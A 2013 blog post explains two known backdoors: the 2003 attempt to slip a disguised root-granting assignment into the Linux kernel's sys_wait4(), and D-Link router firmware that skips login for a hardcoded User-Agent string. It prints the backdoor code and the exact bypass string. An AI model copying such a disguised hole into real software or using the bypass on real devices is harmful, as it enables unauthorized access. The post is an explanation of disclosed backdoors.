1. Of backdoors and bad coding

    by Arjun Sreedharan

    Does "roodkcableoj28840ybtide" mean anything to you?
    By the time you read through this article, you will understand that it is not gibberish exactly.

    The Tux

    Talking about backdoors, I’d like to write about an attempted planting of backdoor in the linux kernel.
    It was the year 2003 and linux kernel was still maintained on BitKeeper.

    The backdoor was just 2 lines added to the /kernel/exit.c file of the Linux kernel’s source code. It was added of the sys_wait4() system call.

    sys_wait4() is a function a process could use to wait until some other process finishes.

    It was presented such that new lines of code were added to make sys_wait4() return an error “EINVAL” (which is the error-code for invalid arguments) when the function was called in a way not permissible.

    The added lines were as follows:

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    	retval = -EINVAL;

    On casually reading the above code, it appears to check if the caller of sys_wait4() is using either of __WCLONE or __WALL flags, and if the user invoking it has the uid of 0 (ie. the root user) . If both conditions are true, the call is aborted with the given error code.

    If you re-examine the piece of code, you’ll find that instead of using the Equality-comparison operator ==, the assignment operator = is used. The code should have been current->uid == 0 instead of current->uid = 0.

    The above piece of code first compares options to the expression (__WCLONE|__WALL).
    if true, it then evaluates (current->uid = 0) which always evaluates to false and also by virtue of the assignment operator sets the value of current->uid to 0, giving root access to the system.

    So the if-statement always evaluates to false and the code is effectively:

    if ( options == ( __WCLONE | __WALL ) )
    	current->uid = 0;

    So, the code never even checks if the user is root. If the condition for checking the flag succeeds, it grants the process root privileges, thereby making the function sys_wait4() a backdoor to get unlimited privileges in a machine just by setting the right flags.

    Now that I think about this, I frequently make the accident of using the = operator instead of the == operator. Perhaps, I may have written some good backdoors by now. Who knows !!

    D-Link Router

    Just a month ago, a security whiz named Chris Heffner exposed a backdoor contained in certain versions of D-Link router firmware. He found that the firmware performs an strcmp between the string pointer that represents the User-Agent header of the HTTP request and the string xmlset_roodkcableoj28840ybtide. If the strings match, the login-checking function call is skipped and the authentication-function returns 1 (meaning authentication OK).

    This means that, if you set your browser’s User-Agent to xmlset_roodkcableoj28840ybtide, then you can access the web interface without any authentication ;)

    If you carefully look at the string that facilitates the backdoor entry, is it’s basically xmlset_ prepended with the following written backwards :

    "Edit by 04882 Joel Backdoor"

    Did I not tell you, you would get to know what roodkcableoj28840ybtide means !!!

    Hardwired passwords were a design blunder three decades ago, but some Joel guy had to go home early from office and he decided to make life convenient.

    PS: Hot News - United States NSA asked Linus Torvalds to inject backdoors into Linux/GNU
    PS 2: It was never brought out who was behind the 2003 attempt to plant a backdoor in the linux kernel.

  2. Disclaimer: The views expressed here are solely those of the author in his private capacity and do not in any way represent the views of the author's employer or any organization associated with the author.

Interesting Things:

Recent Posts:
Simplicity is the ultimate sophistication. (Leonardo Da Vinci)
Arjun Sreedharan 2013